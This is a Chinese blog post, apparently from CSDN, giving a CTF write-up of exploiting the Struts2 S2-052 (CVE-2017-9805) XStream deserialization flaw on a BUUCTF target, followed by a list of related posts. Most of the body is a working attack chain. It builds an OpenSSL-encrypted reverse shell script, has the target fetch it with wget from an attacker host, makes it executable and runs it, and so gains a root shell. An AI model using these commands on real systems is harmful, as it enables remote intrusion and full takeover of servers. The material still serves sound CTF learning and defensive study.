[struts2]s2-052 BUUCTF

已于 2022-03-31 21:57:19 修改
阅读量3.7k 收藏
点赞数
分类专栏: CTF 文章标签: web安全
于 2022-03-29 13:42:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/krysyal/article/details/123819165
版权

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!

参考文档

本地检测

python struts-pwn.py --url "http://node4.buuoj.cn:29619/orders/3/edit"

vps

使用openssl生成生成证书的公私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在自己的vps上创建一个openssl反弹会话的脚本
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 1.1.1.1:443 > /tmp/s; rm /tmp/s
然后在该目录下开启http服务
python3 -m http.server 8010

本地

此处,我本想根据参考文档里用到的exp脚本进行复现,但是效果不是很理想,测试了一下dnslog没有记录,并且vps上开启http服务,利用exp进行请求的时候8010端口没有收到请求,所以我们重新找了一个exp

通过漏洞利用工具执行以下命令
python3 "Apache Struts 2 CVE-2017-9805.py" --exploit -u "http://node4.buuoj.cn:29619/orders/3/edit" -c "wget http://1.1.1.1:8010/openssl.sh"

在这里插入图片描述

利用工具将传过去的sh脚本修改权限
python3 "Apache Struts 2 CVE-2017-9805.py" --exploit -u "http://node4.buuoj.cn:29619/orders/3/edit"  -c "chmod 777 openssl.sh"

vps

重新打开openssl监听443端口加密流量
openssl s_server -quiet -key key.pem -cert cert.pem -port 443

本地

运行该sh脚本
python3 "Apache Struts 2 CVE-2017-9805.py" --exploit -u "http://node4.buuoj.cn:29619/orders/3/edit"  -c "/bin/bash ./openssl.sh"

在这里插入图片描述
vps

成功获得一个shell,且权限是root
读env处的flag

在这里插入图片描述

一心一易一
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1478
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Web框架漏洞--Struts2 漏洞S2-052
qq_54713392的博客
05-08 871
Web框架漏洞–Struts2 漏洞S2-052 漏洞利用: Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-052
BUUCTF笔记之Real部分WP([struts2]s2-052)
克格莫(有需要的私信)
03-05 730
这题有点小坑,值得单独写一篇文章分析它的坑。 先上flag:
Struts2 S2-052
卧龙居
10-25 2621
Struts2 S2-052影响的版本是Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12。 主要是struts2的rest plugin的XStreamHandler存在问题。 所以,我们在复现此漏洞时,需要引入struts2-core,struts2-rest-plugin以及struts2-convention-plu
S2-052Struts2远程命令执行漏洞(CVE-2017-9805)
Unitue_逆流
10-13 5988
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Struts2 s2-052 REST插件远程代码执行技术分析与防护方案
zzkk_的博客
09-07 1602
2017年9月5日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x以及之前的部分2.x版本的REST插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有任何类型过滤导致远程代码执行。 相关地址: https://struts.apa
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。 Github项目地址: 0x01 漏洞影响 启用Struts REST插件并使用XStream组件对XML进行反序列操作...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Strtus2漏洞 - Struts2-052 Struts2-057 Struts2-059
HAKUNAMATATATTA的博客
12-29 925
S2-052 S2-057 S2-059漏洞复现过程
struts2(s2-052)远程命令执行漏洞复现
weixin_30929011的博客
09-07 734
漏洞描述: 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验...
Struts2 S2-052漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
0x00 调试环境搭建 使用官方的rest-sample即可,下载2.5.12版本的源码https://github.com/apache/struts/archive/STRUTS_2_5_12.zip,然后将apps下面的rest-showcase源码脱下来。 Eclipse中新建一个maven工程,web.xml,pom.xml和struts.xml如下: pom.xml &...
Struts2 新漏洞(S2-052)出现利用实例,面对漏洞企业应当分秒必争
weixin_33895016的博客
11-02 205
9月5日,千疮百孔的 Struts2 应用又曝出存在新的高危远程代码执行漏洞(S2-052)。该漏洞由 lgtm.com 的安全研究员汇报,编号为 CVE-2017-9805 ,漏洞危害程度为高危(Critical)。其实,相似的漏洞已经在 Struts 中多次发现,今年早些时候攻击者还利用了 Windows 服务器中的 Apache Strut...
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3816
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
struts2-052漏洞学习
qq_44312507的博客
12-17 743
struts2-052漏洞学习文档 一、了解漏洞 1.struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其...
S2-045之不能再当脚本小子之格物致知之知行合一
shy的博客
03-05 490
发现奇怪告警 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Type: {\u0028\u0023\u006e\u0069\u006b\u0065\u003d\u0027multipart/form-data\u0027\u0029\u002e\u0028\u0023\u0064\u006d\u003d\u0040\u006f\u0067\u006e\u006c\u002e\u004f\u0067\u006e\u
S2-052 远程代码执行漏洞
EC_Carrot的博客
08-12 544
漏洞简介 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md 漏洞复现 访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o
Struts2——052(CVE-2017-9805)远程代码执行漏洞复现
Stephen Wolf
11-23 1308
一、漏洞描述: 2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞,漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStre...
S2-052远程代码执行漏洞和S2-045远程代码执行漏洞复现
weixin_48739941的博客
04-21 1319
1.复现S2-052远程代码执行漏洞 (1) cd vulhub/struts2/s2-052 切换目录。 (2) docker-compose up -d 启动 (3) http://192.168.80.157:8080/orders.xhtml (4)burpsuite抓包。 (5)send to repeater,修改数据包: POST /orders/3/edit HTTP/1.1 Host: 192.168.80.157:8080 Accept: */* A
Struts2 S2-016上传webshell的需求分析
最新发布
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值